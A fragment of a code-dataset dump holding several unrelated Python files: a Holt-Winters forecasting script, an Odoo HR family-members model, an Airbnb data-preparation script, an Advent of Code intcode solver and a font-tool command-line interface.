trend=\"add\").fit(smoothing_level=best_alpha, # trend=\"mul\" WOULD BE THE MULTIPLICATIVE VARIANT\n smoothing_slope=best_beta) # WE SET THE TREND TO \"add\" BECAUSE THE SERIES IS ADDITIVE\n\ny_pred = final_des_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Double Exponential Smoothing\")\n\n\n##################################################\n# Triple Exponential Smoothing (Holt-Winters)\n##################################################\n\n# TES = SES + DES + Seasonality\n\n\ntes_model = ExponentialSmoothing(train,\n trend=\"add\",\n seasonal=\"add\",\n seasonal_periods=12).fit(smoothing_level=0.5, # SEASONALITY IS 12, I.E. A SEASON COMPLETES EVERY 12 MONTHS\n smoothing_slope=0.5,\n smoothing_seasonal=0.5)\n\ny_pred = tes_model.forecast(48)\nplot_co2(train, test, y_pred, \"Triple Exponential Smoothing\")\n\n############################\n# Hyperparameter Optimization\n############################\n\nalphas = betas = gammas = np.arange(0.20, 1, 0.10) # THE SAME RANGE FOR ALL THREE ARRAYS\n\nabg = list(itertools.product(alphas, betas, gammas)) # GENERATES ALL COMBINATIONS OF THE 3 PARAMETERS.\n\n
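# (Editor's note, added:) np.arange(0.20, 1, 0.10) yields 8 candidate values per parameter,\n# so the optimizer below fits 8**3 = 512 TES models and keeps the best by MAE.\n\n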
\ndef tes_optimizer(train, abg, step=48): # FUNCTION USED TO OPTIMIZE THE TES METHOD\n best_alpha, best_beta, best_gamma, best_mae = None, None, None, float(\"inf\")\n for comb in abg:\n tes_model = ExponentialSmoothing(train, trend=\"add\", seasonal=\"add\", seasonal_periods=12).\\\n fit(smoothing_level=comb[0], smoothing_slope=comb[1], smoothing_seasonal=comb[2])\n y_pred = tes_model.forecast(step)\n mae = mean_absolute_error(test, y_pred)\n if mae < best_mae:\n best_alpha, best_beta, best_gamma, best_mae = comb[0], comb[1], comb[2], mae\n print([round(comb[0], 2), round(comb[1], 2), round(comb[2], 2), round(mae, 2)])\n\n print(\"best_alpha:\", round(best_alpha, 2), \"best_beta:\", round(best_beta, 2), \"best_gamma:\", round(best_gamma, 2),\n \"best_mae:\", round(best_mae, 4))\n\n return best_alpha, best_beta, best_gamma, best_mae\n\nbest_alpha, best_beta, best_gamma, best_mae = tes_optimizer(train, abg)\n\n\n############################\n# Final TES Model\n############################\n\nfinal_tes_model = ExponentialSmoothing(train, trend=\"add\", seasonal=\"add\", seasonal_periods=12).\\\n fit(smoothing_level=best_alpha, smoothing_trend=best_beta, smoothing_seasonal=best_gamma)\n\ny_pred = final_tes_model.forecast(48)\n\nplot_co2(train, test, y_pred, \"Triple Exponential Smoothing\")\n\n\n\n\n\n\n\n\n","repo_name":"anilozcan35/DSMLBC8-","sub_path":"7.Modül/time_series/smoothing_methods.py","file_name":"smoothing_methods.py","file_ext":"py","file_size_in_byte":10157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27513625733","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nimport time\nfrom dateutil import relativedelta\nfrom odoo import models, fields, api, _\nfrom time import strftime, strptime\nfrom datetime import date, datetime\nfrom odoo.exceptions import UserError, ValidationError\n\nclass hr_family_item(models.Model):\n _name = 'hr.family.item'\n _description = 'Family Members'\n _order = 'name desc, age desc'\n\n\n @api.depends('age','birth')\n def _compute_age(self):\n for r in self:\n if not r.birth:\n return\n today_date = datetime.now()\n birth_date = datetime.strptime(r.birth, '%Y-%m-%d')\n delta = today_date - birth_date\n r.age = int(delta.days / 365)\n\n
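 # (Editor's note, added:) dividing by 365 ignores leap years; for an exact age,\n # relativedelta.relativedelta(today_date, birth_date).years could be used instead,\n # since dateutil's relativedelta is already imported above.\n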
 @api.onchange('birth')\n def onchange_birth(self):\n for r in self:\n if r.birth:\n today_date = datetime.now()\n birth_date = datetime.strptime(r.birth, '%Y-%m-%d')\n if birth_date >= today_date:\n raise ValidationError(_('Date of birth cannot be later than the current date'))\n\n _RELATION = [('hb_wife', 'Wife/Husband'), ('son', 'Son'),\n ('father', 'Father'), ('mother', 'Mother'),\n ('uncle', 'Uncle'), ('brother', 'Brother'),\n ('nephew', 'Nephew'), ('ulibre', 'Free Union'),\n ('entenado', 'Other')]\n _TIPOID = [('id','ID'),('passport','Passport')]\n\n _columns = {\n 'name' : fields.char('Name', size=50, required=True),\n 'sex' : fields.selection([('h', 'Male'), ('m', 'Female')], 'Sex'),\n 'age': fields.function(_compute_age, method=True, string=\"Age\", store=True, type=\"integer\"),\n 'birth' : fields.date('Date of birth', required=True),\n 'relationship' : fields.selection(_RELATION, 'Relationship'),\n 'disabled' : fields.boolean('Disabled?', help=\"Check this box if the family member is disabled; note that a dependent who is of legal age but has a disability is taken into account for the profit-sharing calculation\"),\n 'disabled_type': fields.char('Disabled Type',size=64),\n 'disabled_percent': fields.integer('Disabled Percent'),\n 'disabled_id': fields.char('CONADIS ID',size=10,help=\"CONADIS identification code.\"),\n 'employee_id' : fields.many2one('hr.employee', 'Employee'),\n 'type_id' : fields.selection(_TIPOID, \"Type ID\"),\n 'identification_id': fields.char(_('Identification Number'), size=13, help=_('Identifier or Unique Register')),\n 'tutela': fields.boolean('Guardianship?', help=\"Check this box if the family member is under guardianship; note that a dependent under guardianship is taken into account for the profit-sharing calculation\"),\n }\n\n _defaults = {\n 'age' : 0,\n }\n\nhr_family_item()\n\nclass hr_employee(models.Model):\n _inherit = 'hr.employee'\n\n def _compute_utilities_charges(self, cr, uid, ids, field_name, arg, context):\n for employee in self.browse(cr, uid, ids):\n aux = 0\n for family in employee.family_item_ids:\n if family.relationship == 'hb_wife':\n aux += 1\n if family.age < 18:\n aux += 1\n if family.tutela or family.disabled:\n aux += 1\n return {employee.id:aux}\n\n _columns = {\n 'family_item_ids': fields.one2many('hr.family.item', 'employee_id', \"Family Members\"),\n 'utilities_charges': fields.function(_compute_utilities_charges, method=True, string=\"Utilities Charges\",\n store=False, type=\"integer\"),\n 'disabled': fields.boolean('Disabled?',help=\"Check this if the employee has any kind of limitation to do some activities, caused by some physical or mental disability.\"),\n 'disabled_type': fields.char('Disabled Type',size=64),\n 'disabled_percent': fields.integer('Disabled Percent'),\n 'disabled_id': fields.char('CONADIS ID',size=10,help=\"CONADIS identification code.\"),\n\n }\n\n _defaults = {\n 'utilities_charges': 0,\n 'active':True,\n }\n","repo_name":"jclopezar/mascoop","sub_path":"hr_mascoop/models/hr_familia.py","file_name":"hr_familia.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7993185979","text":"import pandas as pd\nimport numpy as np\nimport re, os, datetime\nimport matplotlib.pyplot as plt\n\ndef brief(df):\n returnString = \"\"\n numRows = len(df)\n numColumns = len(df.columns)\n # Append parts of the string to the returnString\n returnString += \"This dataset has \" + str(numRows) + \" Rows \" + str(numColumns) + \" Attributes\" + '\\n'+'\\n'\n # Describe function to fetch some summary statistics\n numeric_df = df.describe()\n #Keep only relevant statistics and take transpose\n numeric_df_T = numeric_df.transpose().loc[:, ['mean', '50%', 'std', 'min', 'max']]\n # Rearrangement of columns\n numeric_df_T.columns = ['Mean','Median','Sdev','Min','Max']\n numeric_df_T['Missing'] = 0\n numeric_df_T['Attribute_ID'] = 0\n for i in numeric_df_T.index:\n # Counting number of Missing values\n numeric_df_T.loc[i, 'Missing'] = df[i].isnull().sum()\n # Introducing column to keep track of original Attribute position\n numeric_df_T.loc[i, 'Attribute_ID'] = list(df.columns).index(i) + 1\n numeric_df_T['Attribute_Name'] = numeric_df_T.index\n # Starting index from 1\n numeric_df_T.index = range(1, len(numeric_df_T) + 1)\n # Final re-arrangement of Numeric Attributes\n numeric_df_T = numeric_df_T.loc[:,['Attribute_ID', 'Attribute_Name', 'Missing', 'Mean', 'Median', 'Sdev', 'Min', 'Max']]\n returnString+=\"real valued attributes\"+'\\n' + \"-\"*len(\"real valued attributes\")+'\\n'\n returnString += numeric_df_T.to_string()+'\\n'\n returnString += \"symbolic attributes\" + 
'\\n' + \"-\" * len(\"symbolic attributes\") + '\\n'\n cols = df.columns\n num_cols = df._get_numeric_data().columns\n # Finding the categorical columns\n cat_cols = list(set(cols) - set(num_cols))\n # Making the initial dataframe with all categorical attributes names and IDs\n sym_df = pd.DataFrame({'Attribute_ID':[list(df.columns).index(i)+1 for i in cat_cols],'Attribute_Name':cat_cols})\n #Initializing values\n sym_df['Missing']=0\n sym_df['arity'] = 0\n sym_df['MCVs_counts'] = \"\"\n #Iterate over all categorical variables and find number of missing and arity and MCV counts\n for i in range(len(cat_cols)):\n #Add Missing value as the second column\n sym_df.iloc[i,2]=df.loc[:,cat_cols[i]].isnull().sum()\n # Drop NA values before arity and MCV counts\n series_without_missing = df.loc[:,cat_cols[i]].dropna()\n # Count frequency of each category\n series_wo_miss_counts = series_without_missing.value_counts()\n # Sort the values\n series_wo_miss_counts.sort_values(inplace=True, ascending=False)\n # Arity count the number of unique values\n sym_df.iloc[i, 3] = len(series_wo_miss_counts)\n # MCV string to iterate over all these values and include their count\n mcv_string = \"\"\n for j in range(min(3,len(series_wo_miss_counts))):\n mcv_string+=str(series_wo_miss_counts.index[j])+\"(\"+str(series_wo_miss_counts[j])+\") \"\n # Add this string as the 4th column in the dataframe\n sym_df.iloc[i, 4] = mcv_string\n sym_df.index = range(1, len(sym_df) + 1)\n #Add the dataframe to the string\n returnString += sym_df.to_string() + '\\n'\n return returnString\n\ndataCompileDir = '/Users/paridhichoudhary/Documents/ADS/Project/dataCompile/'\ndataDir = '/Users/paridhichoudhary/Documents/ADS/Project/data/'\n#\ncompiledCalendarDF = pd.read_csv(dataDir+\"compiledCalendar_Sparse.csv\")\ncompiledListingsDF = pd.read_csv(dataDir+\"CompiledListings_Cleaned.csv\")\n\n\n# print(compiledListingsDF.columns)\n# print(brief(compiledListingsDF))\nstableListingsDF = pd.read_csv(dataCompileDir+\"/Stable_Listings.csv\")\nids = stableListingsDF['ID']\ncompiledListingsDF = compiledListingsDF[compiledListingsDF['id'].isin(ids)]\ncompiledListingsDF['last_scraped'] = compiledListingsDF['last_scraped'].apply(lambda r: r.split('/')[0]+'/'+r.split('/')[1]+'/20'+r.split('/')[2] if len(r.split('/')[2])==2 else r)\n# print(compiledListingsDF.columns)\ncompiledListingsDFToMerge = compiledListingsDF.loc[:,['accommodates', 'amenities','bathrooms', 'bed_type',\n 'bedrooms', 'beds', 'cancellation_policy',\n 'city', 'cleaning_fee', 'extra_people', 'guests_included',\n 'host_is_superhost', 'host_response_rate',\n 'id','instant_bookable', 'is_location_exact','last_scraped',\n 'lastScrapedNumber', 'latitude','longitude', 'market', 'maximum_nights', 'minimum_nights',\n 'neighbourhood_cleansed','number_of_reviews', 'property_type',\n 'require_guest_phone_verification', 'require_guest_profile_picture',\n 'requires_license', 'room_type', 'security_deposit', 'street','zipcode']]\nfinalDF = pd.merge(compiledListingsDFToMerge,compiledCalendarDF,how='left',left_on=['id','lastScrapedNumber'],right_on=['listing_id','lastScrapedNumber'])\nindexes=finalDF[finalDF['Year'].isnull()].index\nfinalDF.loc[indexes,'Year'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\nfinalDF.loc[indexes,'Month'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\nfinalDF.loc[indexes,'Day'] = finalDF.loc[indexes,'last_scraped'].apply(lambda r: 
datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\ncompiledListingsDF['Year'] = compiledListingsDF['last_scraped'].apply(lambda r: datetime.datetime.strptime(r,\"%d/%m/%Y\").year)\ncompiledListingsDF['Month'] = compiledListingsDF['last_scraped'].apply(lambda r: datetime.datetime.strptime(r, \"%d/%m/%Y\").month)\ncompiledListingsDF['Day'] = compiledListingsDF['last_scraped'].apply(lambda r: 1 if datetime.datetime.strptime(r, \"%d/%m/%Y\").weekday()==6 or datetime.datetime.strptime(r, \"%d/%m/%Y\").weekday()==5 else 0 )\ncompiledListingsDFToAppend = compiledListingsDF.loc[:,finalDF.columns]\nfinalDF = finalDF.append(compiledListingsDFToAppend,ignore_index=True)\nfinalDF.drop(labels='listing_id',axis=1,inplace=True)\n# medianDF = finalDF[~finalDF['cleaning_fee'].isnull()].groupby(['property_type','room_type'])['cleaning_fee'].median().reset_index()\nindexes = finalDF[finalDF['cleaning_fee'].isnull()].index\n# cFmissingDF = finalDF.loc[indexes,:]\n# CFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['cleaning_fee_y']\nfinalDF.loc[indexes,'cleaning_fee']= 0\n\n# medianDF = finalDF[~finalDF['security_deposit'].isnull()].groupby(['property_type','room_type'])['security_deposit'].median().reset_index()\nindexes = finalDF[finalDF['security_deposit'].isnull()].index\n# cFmissingDF = finalDF[finalDF['security_deposit'].isnull()]\n# CFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['security_deposit_y']\nfinalDF.loc[indexes,'security_deposit'] = 0\n\nmedianDF = finalDF[~finalDF['bathrooms'].isnull()].groupby(['property_type','room_type'])['bathrooms'].median().reset_index()\nindexes = finalDF[finalDF['bathrooms'].isnull()].index\ncFmissingDF = finalDF[finalDF['bathrooms'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['bathrooms_y']\nfinalDF.loc[indexes,'bathrooms'] = CFreplaceDF\n\nmedianDF = finalDF[~finalDF['bedrooms'].isnull()].groupby(['property_type','room_type'])['bedrooms'].median().reset_index()\nindexes = finalDF[finalDF['bedrooms'].isnull()].index\ncFmissingDF = finalDF[finalDF['bedrooms'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['bedrooms_y']\nfinalDF.loc[indexes,'bedrooms'] = CFreplaceDF\n\nmedianDF = finalDF[~finalDF['beds'].isnull()].groupby(['property_type','room_type'])['beds'].median().reset_index()\nindexes = finalDF[finalDF['beds'].isnull()].index\ncFmissingDF = finalDF[finalDF['beds'].isnull()]\nCFreplaceDF = pd.merge(cFmissingDF,medianDF,how='left',on=['property_type','room_type'])['beds_y']\nfinalDF.loc[indexes,'beds'] = CFreplaceDF\nfinalDF = finalDF.dropna()\nfinalDF.to_csv(dataDir+\"CalendarListingsCombined_Sparse.csv\",index=False)","repo_name":"paridhichoudhary/Airbnb-Price-Predictor","sub_path":"dayWiseRegressionDataPreparation.py","file_name":"dayWiseRegressionDataPreparation.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11069811606","text":"import time\nimport itertools\nfrom collections import defaultdict\n\nCURR_MS = lambda: time.time() * 1000\n\nprint('+-------------------------+')\nprint('| ADVENT OF CODE - DAY XX |')\nprint('+-------------------------+')\n\nSTART_READ = CURR_MS()\nprint('\\nREADING FILE... 
',end='')\nwith open(\"input.txt\") as file:\n    inputs = file.read().strip().split(',')\nprint('%.6fms\\n' % (CURR_MS() - START_READ))\n\ndef run_intcode(code, prog_inputs):\n    # OPCODES             1  2  3  4  5  6  7  8\n    arg_sizes = defaultdict(lambda:0, dict(enumerate([0, 3, 3, 1, 1, 2, 2, 3, 3])))\n\n    def get_arg(arg, instr_pt, write):\n        return code[instr_pt+arg] if write \\\n            else (code[code[instr_pt+arg]] if int(instr[-(2+arg)]) == 0 else code[instr_pt+arg])\n\n    code = list(map(int, code))\n    prog_inputs = list(prog_inputs)\n    outputs = []\n    instr_pt = 0\n\n    while True:\n        jump = False\n        instr = str(code[instr_pt])\n        opcode = int(instr[-2:])\n        argsize = arg_sizes[opcode]\n        instr = instr.zfill(argsize + 2)\n\n        if opcode == 99: return outputs # HALT\n        elif opcode == 1: # ADD\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            arg3 = get_arg(3, instr_pt, True)\n            code[arg3] = arg1 + arg2\n        elif opcode == 2: # MULTIPLY\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            arg3 = get_arg(3, instr_pt, True)\n            code[arg3] = arg1 * arg2\n        elif opcode == 3: # INPUT\n            arg1 = get_arg(1, instr_pt, True)\n            in_command = prog_inputs.pop(0)\n            code[arg1] = in_command\n        elif opcode == 4: # OUTPUT\n            arg1 = get_arg(1, instr_pt, False)\n            outputs.append(arg1)\n        elif opcode == 5: # JUMP IF TRUE\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            if arg1 != 0:\n                instr_pt = arg2\n                jump = True\n        elif opcode == 6: # JUMP IF FALSE\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            if arg1 == 0:\n                instr_pt = arg2\n                jump = True\n        elif opcode == 7: # LESS THAN\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            arg3 = get_arg(3, instr_pt, True)\n            code[arg3] = 1 if arg1 < arg2 else 0\n        elif opcode == 8: # EQUALS\n            arg1 = get_arg(1, instr_pt, False)\n            arg2 = get_arg(2, instr_pt, False)\n            arg3 = get_arg(3, instr_pt, True)\n            code[arg3] = 1 if arg1 == arg2 else 0\n        if not jump: instr_pt = instr_pt + (argsize + 1)\n\ndef part_one():\n    max_thruster_sig = 0\n    phases = list(itertools.permutations(range(5)))\n\n    for phase in phases:\n        thruster_sig = \\\n            run_intcode(inputs, [phase[4], \\\n            run_intcode(inputs, [phase[3], \\\n            run_intcode(inputs, [phase[2], \\\n            run_intcode(inputs, [phase[1], \\\n            run_intcode(inputs, [phase[0], \\\n            0])[0]])[0]])[0]])[0]])[0]\n        max_thruster_sig = max(thruster_sig, max_thruster_sig);\n    return max_thruster_sig\n\ndef part_two():\n    max_thruster_sig = 0\n    phases = list(itertools.permutations(range(5,10)))\n\n    for phase in phases:\n        first_loop = True\n        amp_outs = [None]*5\n        # TODO: intcode needs to be rewritten to be resumable, maybe using [yield];\n        # see the sketch added below.\n\n    return max_thruster_sig\n\n
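# (Editor's addition:) a minimal sketch of how part two's feedback loop could work. The names\n# run_amp and part_two_feedback are hypothetical additions, not part of the original solution:\n# run_amp is a resumable re-implementation of the intcode machine above that pauses (yield)\n# whenever its input queue is empty.\ndef run_amp(code, in_q, out_q):\n    code = list(map(int, code))\n    pt = 0\n    while True:\n        instr = str(code[pt]).zfill(5)\n        opcode = int(instr[-2:])\n        def arg(n, write=False):\n            # parameter mode digit: '1' = immediate, '0' = position\n            return code[pt + n] if write or instr[-(2 + n)] == '1' else code[code[pt + n]]\n        if opcode == 99: # HALT\n            return\n        if opcode == 3: # INPUT\n            while not in_q:\n                yield # wait until the previous amplifier produces a value\n            code[arg(1, True)] = in_q.pop(0)\n            pt += 2\n        elif opcode == 4: # OUTPUT\n            out_q.append(arg(1))\n            pt += 2\n        elif opcode in (5, 6): # JUMP IF TRUE / JUMP IF FALSE\n            pt = arg(2) if (arg(1) != 0) == (opcode == 5) else pt + 3\n        else: # 1 ADD, 2 MULTIPLY, 7 LESS THAN, 8 EQUALS\n            a, b = arg(1), arg(2)\n            code[arg(3, True)] = {1: a + b, 2: a * b, 7: int(a < b), 8: int(a == b)}[opcode]\n            pt += 4\n\ndef part_two_feedback():\n    best = 0\n    for phase in itertools.permutations(range(5, 10)):\n        queues = [[p] for p in phase] # amp i reads queues[i], writes queues[(i+1) % 5]\n        queues[0].append(0) # initial signal for amp A\n        amps = [run_amp(inputs, queues[i], queues[(i + 1) % 5]) for i in range(5)]\n        running = list(amps)\n        while running:\n            for amp in list(running):\n                try:\n                    next(amp) # run until the amp needs input or halts\n                except StopIteration:\n                    running.remove(amp)\n        best = max(best, queues[0][-1]) # last value amp E fed back to amp A\n    return best\n\nprint('PART TWO (feedback sketch): ' + str(part_two_feedback()))\n\n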
START_ONE = CURR_MS()\nprint('PART ONE: ' + str(part_one()))\nprint('TIME TAKEN... %.6fms\\n' % (CURR_MS() - START_ONE))\n\nSTART_TWO = CURR_MS()\nprint('PART TWO: ' + str(part_two()))\nprint('TIME TAKEN... %.6fms\\n' % (CURR_MS() - START_TWO))\n","repo_name":"andrewfhou/advent-of-code-2019","sub_path":"day07/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30924462338","text":"import os\nimport sys\n\nimport click\nfrom fontTools.ttLib import TTFont\nfrom ftcli.Lib.configHandler import configHandler\nfrom ftcli.Lib.csvHandler import csvHandler\nfrom ftcli.Lib.pyFont import pyFont\nfrom ftcli.Lib.GUI import GUI\nfrom ftcli.Lib.utils import (getConfigPath, getCsvPath, getFontsList,\n makeOutputFileName)\n\n\n# edit-csv\n@click.group()\ndef editCSV():\n pass\n\n\n@editCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\ndef edit_csv(input_path, config_file):\n \"\"\"\n Command line editor for 'data.csv' files.\n\n This tool is not intended to replace a code editor for CSV files,\n but can help to make small edits without leaving the command line.\n For complex projects, it's strongly recommended to use a code\n editor like Visual Studio Code or even Excel.\n \"\"\"\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file):\n confirm = click.confirm(\n \"\\n%s doesn't exist. Do you want to create it\" % csv_file, default=True)\n if confirm:\n csvHandler(csv_file).resetCSV(config_file=config_file)\n else:\n return\n\n GUI().csvEditor(config_file=config_file, csv_file=csv_file)\n\n\n# edit-cfg\n@click.group()\ndef editCFG():\n pass\n\n\n@editCFG.command()\n@click.argument('config_file', type=click.Path(exists=True, dir_okay=False, resolve_path=True))\ndef edit_cfg(config_file):\n \"\"\"\nCommand line editor for JSON configuration files.\n\nExample:\n\n ftcli wizard edit-cfg \"C:\\\\Fonts\\\\config.json\"\n\nIt is strongly recommended to use this tool to edit the JSON configuration\nfiles. 
It prevents malformed JSON errors and errors due to wrong values (for\nexample, an out of range usWeightClass, or a string where an integer is\nexpected).\n \"\"\"\n\n GUI().cfgEditor(config_file)\n\n\n# init-csv\n@click.group()\ndef initCSV():\n pass\n\n\n@initCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the data.csv and/or config.json files already exist.')\ndef init_csv(input_path, config_file, quiet):\n \"\"\"\nCreates or resets the CSV database file (data.csv).\n\nExample 1:\n\n ftcli wizard init-csv \"C:\\\\Fonts\\\\\"\n\nThe above command will create the 'data.csv' file in C:\\\\Fonts\\\\\n(and a configuration file with default values if it does not exist).\n\nExample 2:\n\n ftcli wizard init-csv \"C:\\\\Fonts\\\\Font.otf\"\n\nThe above command will create the 'data.csv' in the INPUT_PATH folder\n(or parent folder, if INPUT_PATH is a file).\n\ndata.csv file contains:\n\n- the file names;\n\n- the usWidthClass, usWeightClass, bold and italic bits values of all\nfont files found in INPUT_PATH;\n\n- the family name, which the tool tries to guess by reading the name table. It also\ncontains weight and width literals, retrieved by parsing the config.json\nfile.\n\nIt can be edited manually or using the 'ftcli wizard edit-csv INPUT_PATH'\ncommand.\n \"\"\"\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file) or quiet:\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='green')\n\n csv_file = getCsvPath(input_path)\n if not os.path.exists(csv_file) or quiet:\n confirm_overwrite = True\n else:\n confirm_overwrite = click.confirm(\n '{} already exists. Do you want to overwrite it?'.format(csv_file))\n\n if confirm_overwrite:\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n csvHandler(csv_file).resetCSV(config_file=config_file)\n click.secho('{} created'.format(csv_file), fg='green')\n\n\n# init-cfg\n@click.group()\ndef initCFG():\n pass\n\n\n@initCFG.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True, file_okay=False))\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the config.json file already exists.')\ndef init_cfg(input_path, quiet):\n \"\"\"\n Creates a JSON configuration file containing the default values in the specified INPUT_PATH folder.\n \"\"\"\n config_file = getConfigPath(input_path)\n\n if not os.path.exists(config_file) or quiet:\n confirm_overwrite = True\n else:\n confirm_overwrite = click.confirm(\n '\\n{} already exists. 
Do you want to overwrite it?'.format(config_file))\n if confirm_overwrite:\n configHandler(config_file).resetConfig()\n click.secho('{} created'.format(config_file), fg='green')\n\n\n# recalc-csv\n@click.group()\ndef recalcCSV():\n pass\n\n\n@recalcCSV.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-f', '--family-name', default=None,\n help=\"The desired family name. This string will be used to recalculate the CSV lines.\")\n@click.option('-s', '--source-string', type=click.Choice(\n choices=('fname', '1_1_2', '1_4', '1_6', '1_16_17', '1_18', '3_1_2', '3_4', '3_6', '3_16_17', 'cff_1', 'cff_2', 'cff_3')),\n default='fname', show_choices=True, show_default=True,\n help=\"\"\"\nThe source string used to recalculate the CSV lines can be the file name, a namerecord, a combination of namerecords, or values stored in the 'CFF' table.\n\nFor example, -s '1_1_2' will read a combination of namerecords 1 and 2 in the Mac table.\n\"\"\")\n@click.option('-q', '--quiet', is_flag=True,\n help='Suppress the overwrite confirmation message if the data.csv file already exists.')\ndef recalc_csv(input_path, config_file, family_name, source_string, quiet):\n \"\"\"\nRecalculates the CSV database file (data.csv).\n \"\"\"\n csv_file = getCsvPath(input_path)\n\n if not config_file:\n config_file = getConfigPath(input_path)\n\n # If config.json doesn't exist, it has to be created before.\n if not os.path.exists(config_file):\n configHandler(config_file).resetConfig()\n click.secho('\\n{} didn\\'t exist and has been created'.format(\n config_file), fg='yellow')\n\n if os.path.exists(csv_file) and not quiet:\n confirmation = click.confirm(\n '\\n{} already exists. Do you want to overwrite it?'.format(csv_file))\n if confirmation is True:\n csvHandler(csv_file).recalcCSV(\n config_file=config_file, family_name=family_name, source_string=source_string)\n click.secho('\\n{} created'.format(csv_file), fg='green')\n else:\n # Let's ensure that, if the data.csv file doesn't exist,\n # it is created before recalculation.\n if not os.path.exists(csv_file):\n csvHandler(csv_file).resetCSV(config_file=config_file)\n\n csvHandler(csv_file).recalcCSV(\n config_file=config_file, family_name=family_name, source_string=source_string)\n click.secho('\\n{} created'.format(csv_file), fg='green')\n\n\n# recalc-names\n@click.group()\ndef recalcNames():\n pass\n\n\n@recalcNames.command()\n@click.argument('input_path', type=click.Path(exists=True, resolve_path=True))\n@click.option('-c', '--config-file', type=click.Path(exists=True, resolve_path=True),\n help='Use a custom configuration file instead of the default config.json file located in the same folder of INPUT_PATH.')\n@click.option('-ls', '--linked-styles', type=(click.IntRange(1, 1000), click.IntRange(1, 1000)), default=(None, None),\n help=\"Use this option to activate linked styles. If this option is active, linked styles must be specified. For example: -ls 400 700, or -ls 300 600.\")\n@click.option('-ex', '--exclude-namerecords', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs to skip. The specified name IDs won't be recalculated. 
This option can be repeated (example: -ex 3 -ex 5 -ex 6...).\")\n@click.option('-swdt', '--shorten-width', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for width style name (example: 'Cond' instead of 'Condensed'). This option can be repeated (example: -swdt 3 -swdt 5 -swdt 6...).\")\n@click.option('-swgt', '--shorten-weight', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for weight style name (example: 'Md' instead of 'Medium'). This option can be repeated (example: -swgt 3 -swgt 5 -swgt 6...).\")\n@click.option('-sita', '--shorten-italic', type=click.Choice(choices=['1', '2', '3', '4', '5', '6', '16', '17', '18']), multiple=True,\n help=\"Name IDs where to use the short word for italic style name (example: 'It' instead of 'Italic'). This option can be repeated (example: -sita 3 -sita 5 -sita 6...).\")\n@click.option('-sf', '--super-family', is_flag=True,\n help=\"Superfamily mode. This option affects name IDs 3, 6, 16 and 17 in case of families with widths different than 'Normal'. If this option is active, name ID 6 will be 'FamilyName-WidthWeightSlope' instead of 'FamilyNameWidth-WeightSlope'. Mac and OT family/subfamily names will be 'Family Name / Width Weight Slope' instead of 'Family Name Width / Weight Slope'.\")\n@click.option('-aui', '--alt-uid', is_flag=True,\n help=\"Use alternate unique identifier. By default, namerecord 3 (Unique identifier) is calculated according to the following scheme: 'Version;Vendor code;PostscriptName'. The alternate unique identifier is calculated according to the following scheme: 'Manufacturer: Full Font Name: creation year'\")\n@click.option('-ri', '--regular-italic', 